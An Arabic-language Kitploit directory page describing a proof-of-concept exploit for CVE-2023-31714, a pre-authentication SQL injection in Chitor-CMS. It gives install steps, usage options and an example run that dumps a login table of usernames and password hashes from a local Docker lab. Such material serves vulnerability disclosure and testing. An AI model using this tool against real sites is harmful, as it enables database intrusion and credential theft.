Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-31714 — استغلال إثبات المفهوم لـ CVE-2023-31714، حقن SQL قبل المصادقة في Chitor-CMS < 1.1.2. يقوم بأتمتة تعداد قاعدة البيانات وسرقة بيانات الاعتماد عبر نقطة النهاية /edit_school.php. | Kitploit
أدوات/GitHubGitHub/msd0pe-1/cve-2023-31714
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأمن قواعد البيانات
GitHubmsd0pe-1/cve-2023-31714

CVE-2023-31714

استغلال إثبات المفهوم لـ CVE-2023-31714، حقن SQL قبل المصادقة في Chitor-CMS < 1.1.2. يقوم بأتمتة تعداد قاعدة البيانات وسرقة بيانات الاعتماد عبر نقطة النهاية /edit_school.php.

عرض المستودع
12منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-31714 - Chitor-CMS < 1.1.2 حقن SQL قبل المصادقة

اكتشفه msd0pe
https://github.com/waqaskanju/Chitor-CMS
المشروع بواسطة waqaskanju

chitor1.1.py (تم إصلاحه منذ commit 69d3442)

2023/04/13
تم العثور على حقن SQL في نقطة النهاية /edit_school.php?id= ولا يتطلب أي مصادقة.

chitor1.0.py (أصبح حقن SQL بعد المصادقة منذ commit 5f76192)

2023/04/09
تم العثور على حقن SQL في عدة نقاط نهاية مثل /add_school_class.php?school= ولا يتطلب أي مصادقة. منذ commit 5f76192، تتحقق هذه النقاط من أن المستخدم المسجل لديه صلاحيات التحرير. كان هذا الفحص موجودًا مسبقًا لكنه لم يكن فعالاً.

التثبيت

root@kitploit:~
sudo apt install git virtualenv python3 python3-pip docker-compose
git clone https://github.com/msd0pe-1/cve-2023-31714
virtualenv -p python3 venv
source venv/bin/activate
pip3 install requests prettytable

TO START THE VULNERABLE DOCKER:
  - sudo ./run.sh [1.0|1.1]
TO STOP AND CLEAN THE DOCKER:
  - sudo ./clean.sh

الاستخدام

root@kitploit:~
Usage: python chitor1.1.py [options]

Options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit
  -u URL, --url=URL     target url
  --dbs                 list databases
  -D DATABASE, --db=DATABASE
                        select a database
  --tables              list tables
  -T TABLE, --table=TABLE
                        select a table
  --dump                dump the content

  Examples:
    python3 chitor1.1.py -u http://127.0.0.1 --dbs
    python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db --tables
    python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump

  Chitor-CMS < 1.1.2 Pre-Auth SQL Injection.
  Source code put in public domain by msd0pe,no Copyright
  Any malicious or illegal activity may be punishable by law
  Use at your own risk

مثال

root@kitploit:~
python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump
+----+-------------+------------+----------------------------------+--------+
| Id | Employee_Id | User_Name  |             Password             | Status |
+----+-------------+------------+----------------------------------+--------+
| 1  |      1      |   Guest    | adb831a7fdd83dd1e2a309ce7591dff8 |   1    |
| 2  |      2      | waqaskanju | ################################ |   1    |
| 3  |      3      |   admin    | 21232f297a57a5a743894a0e4a801fc3 |   1    |
+----+-------------+------------+----------------------------------+--------+
تنزيل الأداة